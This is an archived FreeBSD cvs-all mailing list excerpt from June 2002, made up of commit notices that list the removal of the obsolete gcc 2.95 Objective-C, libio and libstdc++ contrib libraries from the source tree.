THREADS.MACH archive.c class.c configure configure.in encoding.c gc.c hash.c init.c libobjc.def libobjc_entry.c linking.m ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/18 11:52:52 PDT Removed files: contrib/libobjc.295 ChangeLog Makefile.in NXConstStr.m Object.m Protocol.m README README.threads THREADS THREADS.MACH archive.c class.c configure configure.in encoding.c gc.c hash.c init.c libobjc.def libobjc_entry.c linking.m makefile.dos misc.c nil_method.c objc-features.texi objects.c sarray.c selector.c sendmsg.c thr-dce.c thr-decosf1.c thr-irix.c thr-mach.c thr-os2.c thr-posix.c thr-pthreads.c thr-single.c thr-solaris.c thr-vxworks.c thr-win32.c thr.c contrib/libobjc.295/objc NXConstStr.h Object.h Protocol.h encoding.h hash.h objc-api.h objc-list.h objc.h runtime.h sarray.h thr.h typedstream.h Log: W/o gcc.295 this is of little use. Revision Changes Path 1.2 +0 -156 src/contrib/libobjc.295/ChangeLog (dead) 1.2 +0 -322 src/contrib/libobjc.295/Makefile.in (dead) 1.2 +0 -42 src/contrib/libobjc.295/NXConstStr.m (dead) 1.2 +0 -387 src/contrib/libobjc.295/Object.m (dead) 1.2 +0 -128 src/contrib/libobjc.295/Protocol.m (dead) 1.2 +0 -97 src/contrib/libobjc.295/README (dead) 1.2 +0 -50 src/contrib/libobjc.295/README.threads (dead) 1.2 +0 -374 src/contrib/libobjc.295/THREADS (dead) 1.2 +0 -23 src/contrib/libobjc.295/THREADS.MACH (dead) 1.2 +0 -1651 src/contrib/libobjc.295/archive.c (dead) 1.2 +0 -358 src/contrib/libobjc.295/class.c (dead) 1.2 +0 -1459 src/contrib/libobjc.295/configure (dead) 1.2 +0 -142 src/contrib/libobjc.295/configure.in (dead) 1.2 +0 -918 src/contrib/libobjc.295/encoding.c (dead) 1.2 +0 -458 src/contrib/libobjc.295/gc.c (dead) 1.2 +0 -283 src/contrib/libobjc.295/hash.c (dead) 1.2 +0 -834 src/contrib/libobjc.295/init.c (dead) 1.2 +0 -161 src/contrib/libobjc.295/libobjc.def (dead) 1.2 +0 -55 src/contrib/libobjc.295/libobjc_entry.c (dead) 1.2 +0 -40 src/contrib/libobjc.295/linking.m (dead) 1.2 +0 -56 src/contrib/libobjc.295/makefile.dos (dead) 1.2 +0 -180 src/contrib/libobjc.295/misc.c (dead) 1.2 +0 -40 src/contrib/libobjc.295/nil_method.c (dead) 1.2 +0 -392 src/contrib/libobjc.295/objc-features.texi (dead) 1.2 +0 -44 src/contrib/libobjc.295/objc/NXConstStr.h (dead) 1.2 +0 -124 src/contrib/libobjc.295/objc/Object.h (dead) 1.2 +0 -58 src/contrib/libobjc.295/objc/Protocol.h (dead) 1.2 +0 -99 src/contrib/libobjc.295/objc/encoding.h (dead) 1.2 +0 -206 src/contrib/libobjc.295/objc/hash.h (dead) 1.2 +0 -597 src/contrib/libobjc.295/objc/objc-api.h (dead) 1.2 +0 -147 src/contrib/libobjc.295/objc/objc-list.h (dead) 1.2 +0 -158 src/contrib/libobjc.295/objc/objc.h (dead) 1.2 +0 -88 src/contrib/libobjc.295/objc/runtime.h (dead) 1.2 +0 -237 src/contrib/libobjc.295/objc/sarray.h (dead) 1.2 +0 -143 src/contrib/libobjc.295/objc/thr.h (dead) 1.2 +0 -132 src/contrib/libobjc.295/objc/typedstream.h (dead) 1.2 +0 -105 src/contrib/libobjc.295/objects.c (dead) 1.2 +0 -522 src/contrib/libobjc.295/sarray.c (dead) 1.2 +0 -458 src/contrib/libobjc.295/selector.c (dead) 1.2 +0 -648 src/contrib/libobjc.295/sendmsg.c (dead) 1.2 +0 -281 src/contrib/libobjc.295/thr-dce.c (dead) 1.2 +0 -281 src/contrib/libobjc.295/thr-decosf1.c (dead) 1.2 +0 -235 src/contrib/libobjc.295/thr-irix.c (dead) 1.2 +0 -312 src/contrib/libobjc.295/thr-mach.c (dead) 1.2 +0 -267 src/contrib/libobjc.295/thr-os2.c (dead) 1.2 +0 -229 src/contrib/libobjc.295/thr-posix.c (dead) 1.2 +0 -218 src/contrib/libobjc.295/thr-pthreads.c (dead) 1.2 +0 -192 src/contrib/libobjc.295/thr-single.c (dead) 1.2 +0 -259 src/contrib/libobjc.295/thr-solaris.c (dead) 1.2 +0 -192 src/contrib/libobjc.295/thr-vxworks.c (dead) 1.2 +0 -272 src/contrib/libobjc.295/thr-win32.c (dead) 1.2 +0 -534 src/contrib/libobjc.295/thr.c (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 11:54:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ED81B37B407; Tue, 18 Jun 2002 11:54:16 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IIsGY78296; Tue, 18 Jun 2002 11:54:16 -0700 (PDT) (envelope-from obrien) Message-Id: <200206181854.g5IIsGY78296@freefall.freebsd.org> From: "David E. O'Brien" Date: Tue, 18 Jun 2002 11:54:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/libio.295 ChangeLog FREEBSD-upgrade Makefile.in NEWS PlotFile.cc PlotFile.h README SFile.cc SFile.h builtinbuf.cc builtinbuf.h cleanup.c config.shared configure.in depend editbuf.cc editbuf.h filebuf.cc filedoalloc.c fileops.c ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/18 11:54:16 PDT Removed files: contrib/libio.295 ChangeLog FREEBSD-upgrade Makefile.in NEWS PlotFile.cc PlotFile.h README SFile.cc SFile.h builtinbuf.cc builtinbuf.h cleanup.c config.shared configure.in depend editbuf.cc editbuf.h filebuf.cc filedoalloc.c fileops.c floatconv.c floatio.h fstream.cc fstream.h gen-params genops.c indstream.cc indstream.h ioassign.cc ioextend.cc iofclose.c iofdopen.c iofeof.c ioferror.c iofflush.c iofflush_u.c iofgetpos.c iofgets.c iofopen.c iofprintf.c iofputs.c iofread.c iofscanf.c iofsetpos.c ioftell.c iofwrite.c iogetc.c iogetdelim.c iogetline.c iogets.c ioignore.c iolibio.h iomanip.cc iomanip.h iopadn.c ioperror.c iopopen.c ioprims.c ioprintf.c ioputc.c ioputs.c ioscanf.c ioseekoff.c ioseekpos.c iosetbuffer.c iosetvbuf.c iosprintf.c iosscanf.c iostdio.h iostream.cc iostream.h iostream.texi iostreamP.h iostrerror.c ioungetc.c iovfprintf.c iovfscanf.c iovsprintf.c iovsscanf.c isgetline.cc isgetsb.cc isscan.cc istream.h libio.h libioP.h osform.cc ostream.h outfloat.c parsestream.cc parsestream.h peekc.c pfstream.cc pfstream.h procbuf.cc procbuf.h sbform.cc sbgetline.cc sbscan.cc stdfiles.c stdiostream.cc stdiostream.h stdstrbufs.cc stdstreams.cc stream.cc stream.h streambuf.cc streambuf.h strfile.h strops.c strstream.cc strstream.h contrib/libio.295/config hpux.mt isc.mt linux.mt linuxaxp1-libc-lock.h linuxaxp1-stdio-lock.h linuxaxp1.mt linuxlibc1.mt mn10200.mt mtsafe.mt netware.mt sco4.mt contrib/libio.295/dbz Makefile.in README altbytes byteflip.c case.c case.h configure.in dbz.1 dbz.3z dbz.c dbz.h dbzmain.c fake.c firstlast25 getmap random.c revbytes stdio.h contrib/libio.295/include empty.h contrib/libio.295/stdio ChangeLog Makefile.in clearerr.c clearerr_u.c configure.in fdopen.c feof.c feof_u.c ferror.c ferror_u.c fgetc.c fileno.c fputc.c fputc_u.c freopen.c fseek.c getc.c getc_u.c getchar.c getchar_u.c getline.c getw.c obprintf.c popen.c putc.c putc_u.c putchar.c putchar_u.c putw.c rewind.c setbuf.c setfileno.c setlinebuf.c snprintf.c stdio.h vasprintf.c vfprintf.c vfscanf.c vprintf.c vscanf.c vsnprintf.c contrib/libio.295/tests ChangeLog Makefile.in configure.in hounddog.cc hounddog.exp hounddog.inp putbackdog.cc tFile.cc tFile.exp tFile.inp tfformat.c tiformat.c tiomanip.cc tiomanip.exp tiomisc.cc tiomisc.exp tstdiomisc.c tstdiomisc.exp contrib/libio.295/testsuite ChangeLog Makefile.in configure.in contrib/libio.295/testsuite/config default.exp contrib/libio.295/testsuite/lib libio.exp contrib/libio.295/testsuite/libio.tests hounddog.exp putbackdog.exp tFile.exp tfformat.exp tiformat.exp tiomanip.exp tiomisc.exp tstdiomisc.exp Log: libwho? libwhat? I see no lib. Revision Changes Path 1.2 +0 -2629 src/contrib/libio.295/ChangeLog (dead) 1.3 +0 -21 src/contrib/libio.295/FREEBSD-upgrade (dead) 1.2 +0 -132 src/contrib/libio.295/Makefile.in (dead) 1.2 +0 -57 src/contrib/libio.295/NEWS (dead) 1.2 +0 -157 src/contrib/libio.295/PlotFile.cc (dead) 1.2 +0 -89 src/contrib/libio.295/PlotFile.h (dead) 1.2 +0 -30 src/contrib/libio.295/README (dead) 1.2 +0 -82 src/contrib/libio.295/SFile.cc (dead) 1.2 +0 -55 src/contrib/libio.295/SFile.h (dead) 1.2 +0 -78 src/contrib/libio.295/builtinbuf.cc (dead) 1.2 +0 -68 src/contrib/libio.295/builtinbuf.h (dead) 1.2 +0 -17 src/contrib/libio.295/cleanup.c (dead) 1.2 +0 -496 src/contrib/libio.295/config.shared (dead) 1.2 +0 -3 src/contrib/libio.295/config/hpux.mt (dead) 1.2 +0 -4 src/contrib/libio.295/config/isc.mt (dead) 1.2 +0 -25 src/contrib/libio.295/config/linux.mt (dead) 1.2 +0 -112 src/contrib/libio.295/config/linuxaxp1-libc-lock.h (dead) 1.2 +0 -36 src/contrib/libio.295/config/linuxaxp1-stdio-lock.h (dead) 1.2 +0 -10 src/contrib/libio.295/config/linuxaxp1.mt (dead) 1.2 +0 -26 src/contrib/libio.295/config/linuxlibc1.mt (dead) 1.2 +0 -3 src/contrib/libio.295/config/mn10200.mt (dead) 1.2 +0 -2 src/contrib/libio.295/config/mtsafe.mt (dead) 1.2 +0 -16 src/contrib/libio.295/config/netware.mt (dead) 1.2 +0 -3 src/contrib/libio.295/config/sco4.mt (dead) 1.2 +0 -154 src/contrib/libio.295/configure.in (dead) 1.2 +0 -218 src/contrib/libio.295/dbz/Makefile.in (dead) 1.2 +0 -25 src/contrib/libio.295/dbz/README (dead) 1.2 +0 -7 src/contrib/libio.295/dbz/altbytes (dead) 1.2 +0 -38 src/contrib/libio.295/dbz/byteflip.c (dead) 1.2 +0 -129 src/contrib/libio.295/dbz/case.c (dead) 1.2 +0 -12 src/contrib/libio.295/dbz/case.h (dead) 1.2 +0 -17 src/contrib/libio.295/dbz/configure.in (dead) 1.2 +0 -221 src/contrib/libio.295/dbz/dbz.1 (dead) 1.2 +0 -547 src/contrib/libio.295/dbz/dbz.3z (dead) 1.2 +0 -1768 src/contrib/libio.295/dbz/dbz.c (dead) 1.2 +0 -32 src/contrib/libio.295/dbz/dbz.h (dead) 1.2 +0 -519 src/contrib/libio.295/dbz/dbzmain.c (dead) 1.2 +0 -144 src/contrib/libio.295/dbz/fake.c (dead) 1.2 +0 -50 src/contrib/libio.295/dbz/firstlast25 (dead) 1.2 +0 -6 src/contrib/libio.295/dbz/getmap (dead) 1.2 +0 -31 src/contrib/libio.295/dbz/random.c (dead) 1.2 +0 -7 src/contrib/libio.295/dbz/revbytes (dead) 1.2 +0 -1 src/contrib/libio.295/dbz/stdio.h (dead) 1.2 +0 -352 src/contrib/libio.295/depend (dead) 1.2 +0 -717 src/contrib/libio.295/editbuf.cc (dead) 1.2 +0 -185 src/contrib/libio.295/editbuf.h (dead) 1.2 +0 -215 src/contrib/libio.295/filebuf.cc (dead) 1.2 +0 -110 src/contrib/libio.295/filedoalloc.c (dead) 1.2 +0 -814 src/contrib/libio.295/fileops.c (dead) 1.2 +0 -2375 src/contrib/libio.295/floatconv.c (dead) 1.2 +0 -51 src/contrib/libio.295/floatio.h (dead) 1.2 +0 -110 src/contrib/libio.295/fstream.cc (dead) 1.2 +0 -92 src/contrib/libio.295/fstream.h (dead) 1.2 +0 -734 src/contrib/libio.295/gen-params (dead) 1.2 +0 -946 src/contrib/libio.295/genops.c (dead) 1.2 +0 -37 src/contrib/libio.295/include/empty.h (dead) 1.2 +0 -121 src/contrib/libio.295/indstream.cc (dead) 1.2 +0 -77 src/contrib/libio.295/indstream.h (dead) 1.2 +0 -49 src/contrib/libio.295/ioassign.cc (dead) 1.2 +0 -132 src/contrib/libio.295/ioextend.cc (dead) 1.2 +0 -60 src/contrib/libio.295/iofclose.c (dead) 1.2 +0 -134 src/contrib/libio.295/iofdopen.c (dead) 1.2 +0 -45 src/contrib/libio.295/iofeof.c (dead) 1.2 +0 -45 src/contrib/libio.295/ioferror.c (dead) 1.2 +0 -49 src/contrib/libio.295/iofflush.c (dead) 1.2 +0 -40 src/contrib/libio.295/iofflush_u.c (dead) 1.2 +0 -55 src/contrib/libio.295/iofgetpos.c (dead) 1.2 +0 -56 src/contrib/libio.295/iofgets.c (dead) 1.2 +0 -64 src/contrib/libio.295/iofopen.c (dead) 1.2 +0 -51 src/contrib/libio.295/iofprintf.c (dead) 1.2 +0 -49 src/contrib/libio.295/iofputs.c (dead) 1.2 +0 -49 src/contrib/libio.295/iofread.c (dead) 1.2 +0 -48 src/contrib/libio.295/iofscanf.c (dead) 1.2 +0 -56 src/contrib/libio.295/iofsetpos.c (dead) 1.2 +0 -53 src/contrib/libio.295/ioftell.c (dead) 1.2 +0 -54 src/contrib/libio.295/iofwrite.c (dead) 1.2 +0 -50 src/contrib/libio.295/iogetc.c (dead) 1.2 +0 -125 src/contrib/libio.295/iogetdelim.c (dead) 1.2 +0 -112 src/contrib/libio.295/iogetline.c (dead) 1.2 +0 -71 src/contrib/libio.295/iogets.c (dead) 1.2 +0 -47 src/contrib/libio.295/ioignore.c (dead) 1.2 +0 -63 src/contrib/libio.295/iolibio.h (dead) 1.2 +0 -90 src/contrib/libio.295/iomanip.cc (dead) 1.2 +0 -176 src/contrib/libio.295/iomanip.h (dead) 1.2 +0 -70 src/contrib/libio.295/iopadn.c (dead) 1.2 +0 -22 src/contrib/libio.295/ioperror.c (dead) 1.2 +0 -251 src/contrib/libio.295/iopopen.c (dead) 1.2 +0 -80 src/contrib/libio.295/ioprims.c (dead) 1.2 +0 -47 src/contrib/libio.295/ioprintf.c (dead) 1.2 +0 -44 src/contrib/libio.295/ioputc.c (dead) 1.2 +0 -49 src/contrib/libio.295/ioputs.c (dead) 1.2 +0 -47 src/contrib/libio.295/ioscanf.c (dead) 1.2 +0 -54 src/contrib/libio.295/ioseekoff.c (dead) 1.2 +0 -48 src/contrib/libio.295/ioseekpos.c (dead) 1.2 +0 -46 src/contrib/libio.295/iosetbuffer.c (dead) 1.2 +0 -100 src/contrib/libio.295/iosetvbuf.c (dead) 1.2 +0 -50 src/contrib/libio.295/iosprintf.c (dead) 1.2 +0 -47 src/contrib/libio.295/iosscanf.c (dead) 1.2 +0 -114 src/contrib/libio.295/iostdio.h (dead) 1.2 +0 -990 src/contrib/libio.295/iostream.cc (dead) 1.2 +0 -272 src/contrib/libio.295/iostream.h (dead) 1.2 +0 -1971 src/contrib/libio.295/iostream.texi (dead) 1.2 +0 -26 src/contrib/libio.295/iostreamP.h (dead) 1.2 +0 -12 src/contrib/libio.295/iostrerror.c (dead) 1.2 +0 -46 src/contrib/libio.295/ioungetc.c (dead) 1.2 +0 -890 src/contrib/libio.295/iovfprintf.c (dead) 1.2 +0 -790 src/contrib/libio.295/iovfscanf.c (dead) 1.2 +0 -60 src/contrib/libio.295/iovsprintf.c (dead) 1.2 +0 -59 src/contrib/libio.295/iovsscanf.c (dead) 1.2 +0 -141 src/contrib/libio.295/isgetline.cc (dead) 1.2 +0 -59 src/contrib/libio.295/isgetsb.cc (dead) 1.2 +0 -45 src/contrib/libio.295/isscan.cc (dead) 1.2 +0 -25 src/contrib/libio.295/istream.h (dead) 1.2 +0 -364 src/contrib/libio.295/libio.h (dead) 1.2 +0 -641 src/contrib/libio.295/libioP.h (dead) 1.2 +0 -66 src/contrib/libio.295/osform.cc (dead) 1.2 +0 -25 src/contrib/libio.295/ostream.h (dead) 1.2 +0 -211 src/contrib/libio.295/outfloat.c (dead) 1.2 +0 -317 src/contrib/libio.295/parsestream.cc (dead) 1.2 +0 -156 src/contrib/libio.295/parsestream.h (dead) 1.2 +0 -42 src/contrib/libio.295/peekc.c (dead) 1.2 +0 -92 src/contrib/libio.295/pfstream.cc (dead) 1.2 +0 -59 src/contrib/libio.295/pfstream.h (dead) 1.2 +0 -55 src/contrib/libio.295/procbuf.cc (dead) 1.2 +0 -50 src/contrib/libio.295/procbuf.h (dead) 1.2 +0 -40 src/contrib/libio.295/sbform.cc (dead) 1.2 +0 -31 src/contrib/libio.295/sbgetline.cc (dead) 1.2 +0 -45 src/contrib/libio.295/sbscan.cc (dead) 1.2 +0 -51 src/contrib/libio.295/stdfiles.c (dead) 1.2 +0 -137 src/contrib/libio.295/stdio/ChangeLog (dead) 1.2 +0 -35 src/contrib/libio.295/stdio/Makefile.in (dead) 1.2 +0 -30 src/contrib/libio.295/stdio/clearerr.c (dead) 1.2 +0 -28 src/contrib/libio.295/stdio/clearerr_u.c (dead) 1.2 +0 -49 src/contrib/libio.295/stdio/configure.in (dead) 1.2 +0 -9 src/contrib/libio.295/stdio/fdopen.c (dead) 1.2 +0 -43 src/contrib/libio.295/stdio/feof.c (dead) 1.2 +0 -37 src/contrib/libio.295/stdio/feof_u.c (dead) 1.2 +0 -43 src/contrib/libio.295/stdio/ferror.c (dead) 1.2 +0 -37 src/contrib/libio.295/stdio/ferror_u.c (dead) 1.2 +0 -40 src/contrib/libio.295/stdio/fgetc.c (dead) 1.2 +0 -49 src/contrib/libio.295/stdio/fileno.c (dead) 1.2 +0 -41 src/contrib/libio.295/stdio/fputc.c (dead) 1.2 +0 -38 src/contrib/libio.295/stdio/fputc_u.c (dead) 1.2 +0 -44 src/contrib/libio.295/stdio/freopen.c (dead) 1.2 +0 -42 src/contrib/libio.295/stdio/fseek.c (dead) 1.2 +0 -48 src/contrib/libio.295/stdio/getc.c (dead) 1.2 +0 -37 src/contrib/libio.295/stdio/getc_u.c (dead) 1.2 +0 -40 src/contrib/libio.295/stdio/getchar.c (dead) 1.2 +0 -35 src/contrib/libio.295/stdio/getchar_u.c (dead) 1.2 +0 -13 src/contrib/libio.295/stdio/getline.c (dead) 1.2 +0 -13 src/contrib/libio.295/stdio/getw.c (dead) 1.2 +0 -168 src/contrib/libio.295/stdio/obprintf.c (dead) 1.2 +0 -23 src/contrib/libio.295/stdio/popen.c (dead) 1.2 +0 -42 src/contrib/libio.295/stdio/putc.c (dead) 1.2 +0 -31 src/contrib/libio.295/stdio/putc_u.c (dead) 1.2 +0 -35 src/contrib/libio.295/stdio/putchar.c (dead) 1.2 +0 -30 src/contrib/libio.295/stdio/putchar_u.c (dead) 1.2 +0 -15 src/contrib/libio.295/stdio/putw.c (dead) 1.2 +0 -38 src/contrib/libio.295/stdio/rewind.c (dead) 1.2 +0 -35 src/contrib/libio.295/stdio/setbuf.c (dead) 1.2 +0 -17 src/contrib/libio.295/stdio/setfileno.c (dead) 1.2 +0 -36 src/contrib/libio.295/stdio/setlinebuf.c (dead) 1.2 +0 -51 src/contrib/libio.295/stdio/snprintf.c (dead) 1.2 +0 -219 src/contrib/libio.295/stdio/stdio.h (dead) 1.2 +0 -72 src/contrib/libio.295/stdio/vasprintf.c (dead) 1.2 +0 -35 src/contrib/libio.295/stdio/vfprintf.c (dead) 1.2 +0 -36 src/contrib/libio.295/stdio/vfscanf.c (dead) 1.2 +0 -33 src/contrib/libio.295/stdio/vprintf.c (dead) 1.2 +0 -41 src/contrib/libio.295/stdio/vscanf.c (dead) 1.2 +0 -136 src/contrib/libio.295/stdio/vsnprintf.c (dead) 1.2 +0 -159 src/contrib/libio.295/stdiostream.cc (dead) 1.2 +0 -79 src/contrib/libio.295/stdiostream.h (dead) 1.2 +0 -126 src/contrib/libio.295/stdstrbufs.cc (dead) 1.2 +0 -153 src/contrib/libio.295/stdstreams.cc (dead) 1.2 +0 -170 src/contrib/libio.295/stream.cc (dead) 1.2 +0 -59 src/contrib/libio.295/stream.h (dead) 1.2 +0 -364 src/contrib/libio.295/streambuf.cc (dead) 1.2 +0 -488 src/contrib/libio.295/streambuf.h (dead) 1.2 +0 -71 src/contrib/libio.295/strfile.h (dead) 1.2 +0 -303 src/contrib/libio.295/strops.c (dead) 1.2 +0 -116 src/contrib/libio.295/strstream.cc (dead) 1.2 +0 -113 src/contrib/libio.295/strstream.h (dead) 1.2 +0 -150 src/contrib/libio.295/tests/ChangeLog (dead) 1.2 +0 -195 src/contrib/libio.295/tests/Makefile.in (dead) 1.2 +0 -36 src/contrib/libio.295/tests/configure.in (dead) 1.2 +0 -85 src/contrib/libio.295/tests/hounddog.cc (dead) 1.2 +0 -7 src/contrib/libio.295/tests/hounddog.exp (dead) 1.2 +0 -7 src/contrib/libio.295/tests/hounddog.inp (dead) 1.2 +0 -97 src/contrib/libio.295/tests/putbackdog.cc (dead) 1.2 +0 -558 src/contrib/libio.295/tests/tFile.cc (dead) 1.2 +0 -75 src/contrib/libio.295/tests/tFile.exp (dead) 1.2 +0 -5 src/contrib/libio.295/tests/tFile.inp (dead) 1.2 +0 -4181 src/contrib/libio.295/tests/tfformat.c (dead) 1.2 +0 -5112 src/contrib/libio.295/tests/tiformat.c (dead) 1.2 +0 -35 src/contrib/libio.295/tests/tiomanip.cc (dead) 1.2 +0 -4 src/contrib/libio.295/tests/tiomanip.exp (dead) 1.2 +0 -236 src/contrib/libio.295/tests/tiomisc.cc (dead) 1.2 +0 -11 src/contrib/libio.295/tests/tiomisc.exp (dead) 1.2 +0 -43 src/contrib/libio.295/tests/tstdiomisc.c (dead) 1.2 +0 -8 src/contrib/libio.295/tests/tstdiomisc.exp (dead) 1.2 +0 -74 src/contrib/libio.295/testsuite/ChangeLog (dead) 1.2 +0 -89 src/contrib/libio.295/testsuite/Makefile.in (dead) 1.2 +0 -1 src/contrib/libio.295/testsuite/config/default.exp (dead) 1.2 +0 -22 src/contrib/libio.295/testsuite/configure.in (dead) 1.2 +0 -167 src/contrib/libio.295/testsuite/lib/libio.exp (dead) 1.2 +0 -3 src/contrib/libio.295/testsuite/libio.tests/hounddog.exp (dead) 1.2 +0 -3 src/contrib/libio.295/testsuite/libio.tests/putbackdog.exp (dead) 1.2 +0 -3 src/contrib/libio.295/testsuite/libio.tests/tFile.exp (dead) 1.2 +0 -1 src/contrib/libio.295/testsuite/libio.tests/tfformat.exp (dead) 1.2 +0 -1 src/contrib/libio.295/testsuite/libio.tests/tiformat.exp (dead) 1.2 +0 -1 src/contrib/libio.295/testsuite/libio.tests/tiomanip.exp (dead) 1.2 +0 -1 src/contrib/libio.295/testsuite/libio.tests/tiomisc.exp (dead) 1.2 +0 -1 src/contrib/libio.295/testsuite/libio.tests/tstdiomisc.exp (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 11:58:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5D5BB37B406; Tue, 18 Jun 2002 11:58:26 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IIwQ979078; Tue, 18 Jun 2002 11:58:26 -0700 (PDT) (envelope-from obrien) Message-Id: <200206181858.g5IIwQ979078@freefall.freebsd.org> From: "David E. O'Brien" Date: Tue, 18 Jun 2002 11:58:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/libstdc++.295 ChangeLog FREEBSD-upgrade Makefile.in NEWS cassert cctype cerrno cfloat cinst.cc ciso646 climits clocale cmath cmathi.cc complex complex.h configure.in csetjmp csignal cstdarg cstddef cstdio cstdlib cstdlibi.cc cstring ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/18 11:58:25 PDT Removed files: contrib/libstdc++.295 ChangeLog FREEBSD-upgrade Makefile.in NEWS cassert cctype cerrno cfloat cinst.cc ciso646 climits clocale cmath cmathi.cc complex complex.h configure.in csetjmp csignal cstdarg cstddef cstdio cstdlib cstdlibi.cc cstring cstringi.cc ctime cwchar cwctype fstream iomanip iosfwd iostream sinst.cc sstream stdexcept stdexcepti.cc stl.h stlinst.cc string strstream valarray valarray.cc contrib/libstdc++.295/config aix.ml dec-osf.ml delta.mt elf.ml elfshlibm.ml freebsd.ml gnu.ml hpux.ml irix5.ml linux.ml linux.mt openbsd.ml openbsd.mt posix.mt sol2pth.mt sol2shm.ml sol2solth.mt sunos4.ml x86-interix.ml contrib/libstdc++.295/std bastring.cc bastring.h complext.cc complext.h dcomplex.h fcomplex.h gslice.h gslice_array.h indirect_array.h ldcomplex.h mask_array.h slice.h slice_array.h std_valarray.h straits.h valarray_array.h valarray_array.tcc valarray_meta.h contrib/libstdc++.295/stl ChangeLog README algo.h algobase.h algorithm alloc.h bitset bvector.h defalloc.h deque deque.h function.h functional hash_map hash_map.h hash_set hash_set.h hashtable.h heap.h iterator iterator.h list list.h map map.h memory multimap.h multiset.h numeric pair.h pthread_alloc pthread_alloc.h queue rope rope.h ropeimpl.h set set.h slist slist.h stack stack.h stl_algo.h stl_algobase.h stl_alloc.h stl_bvector.h stl_config.h stl_construct.h stl_deque.h stl_function.h stl_hash_fun.h stl_hash_map.h stl_hash_set.h stl_hashtable.h stl_heap.h stl_iterator.h stl_list.h stl_map.h stl_multimap.h stl_multiset.h stl_numeric.h stl_pair.h stl_queue.h stl_raw_storage_iter.h stl_relops.h stl_rope.h stl_set.h stl_slist.h stl_stack.h stl_tempbuf.h stl_tree.h stl_uninitialized.h stl_vector.h tempbuf.h tree.h type_traits.h utility vector vector.h contrib/libstdc++.295/tests ChangeLog Makefile.in configure.in tcomplex.cc tcomplex.exp tcomplex.inp tlist.cc tlist.exp tmap.cc tmap.exp tstring.cc tstring.exp tstring.inp tvector.cc tvector.exp contrib/libstdc++.295/testsuite ChangeLog Makefile.in configure.in contrib/libstdc++.295/testsuite/config default.exp contrib/libstdc++.295/testsuite/lib libstdc++.exp contrib/libstdc++.295/testsuite/libstdc++.tests test.exp Log: "Appears this 'std' C++ lib isn't very std any more" -- said by anyone trying to now compile C++ code with G++ 3.1 that compiled cleanly with this. Revision Changes Path 1.2 +0 -1106 src/contrib/libstdc++.295/ChangeLog (dead) 1.2 +0 -18 src/contrib/libstdc++.295/FREEBSD-upgrade (dead) 1.2 +0 -322 src/contrib/libstdc++.295/Makefile.in (dead) 1.2 +0 -9 src/contrib/libstdc++.295/NEWS (dead) 1.2 +0 -7 src/contrib/libstdc++.295/cassert (dead) 1.2 +0 -7 src/contrib/libstdc++.295/cctype (dead) 1.2 +0 -7 src/contrib/libstdc++.295/cerrno (dead) 1.2 +0 -7 src/contrib/libstdc++.295/cfloat (dead) 1.2 +0 -155 src/contrib/libstdc++.295/cinst.cc (dead) 1.2 +0 -7 src/contrib/libstdc++.295/ciso646 (dead) 1.2 +0 -7 src/contrib/libstdc++.295/climits (dead) 1.2 +0 -7 src/contrib/libstdc++.295/clocale (dead) 1.2 +0 -76 src/contrib/libstdc++.295/cmath (dead) 1.2 +0 -7 src/contrib/libstdc++.295/cmathi.cc (dead) 1.2 +0 -18 src/contrib/libstdc++.295/complex (dead) 1.2 +0 -6 src/contrib/libstdc++.295/complex.h (dead) 1.2 +0 -8 src/contrib/libstdc++.295/config/aix.ml (dead) 1.2 +0 -6 src/contrib/libstdc++.295/config/dec-osf.ml (dead) 1.2 +0 -2 src/contrib/libstdc++.295/config/delta.mt (dead) 1.2 +0 -8 src/contrib/libstdc++.295/config/elf.ml (dead) 1.2 +0 -6 src/contrib/libstdc++.295/config/elfshlibm.ml (dead) 1.2 +0 -6 src/contrib/libstdc++.295/config/freebsd.ml (dead) 1.2 +0 -6 src/contrib/libstdc++.295/config/gnu.ml (dead) 1.2 +0 -6 src/contrib/libstdc++.295/config/hpux.ml (dead) 1.2 +0 -6 src/contrib/libstdc++.295/config/irix5.ml (dead) 1.2 +0 -6 src/contrib/libstdc++.295/config/linux.ml (dead) 1.2 +0 -2 src/contrib/libstdc++.295/config/linux.mt (dead) 1.2 +0 -7 src/contrib/libstdc++.295/config/openbsd.ml (dead) 1.2 +0 -3 src/contrib/libstdc++.295/config/openbsd.mt (dead) 1.2 +0 -1 src/contrib/libstdc++.295/config/posix.mt (dead) 1.2 +0 -1 src/contrib/libstdc++.295/config/sol2pth.mt (dead) 1.2 +0 -6 src/contrib/libstdc++.295/config/sol2shm.ml (dead) 1.2 +0 -1 src/contrib/libstdc++.295/config/sol2solth.mt (dead) 1.2 +0 -9 src/contrib/libstdc++.295/config/sunos4.ml (dead) 1.2 +0 -9 src/contrib/libstdc++.295/config/x86-interix.ml (dead) 1.2 +0 -119 src/contrib/libstdc++.295/configure.in (dead) 1.2 +0 -8 src/contrib/libstdc++.295/csetjmp (dead) 1.2 +0 -7 src/contrib/libstdc++.295/csignal (dead) 1.2 +0 -7 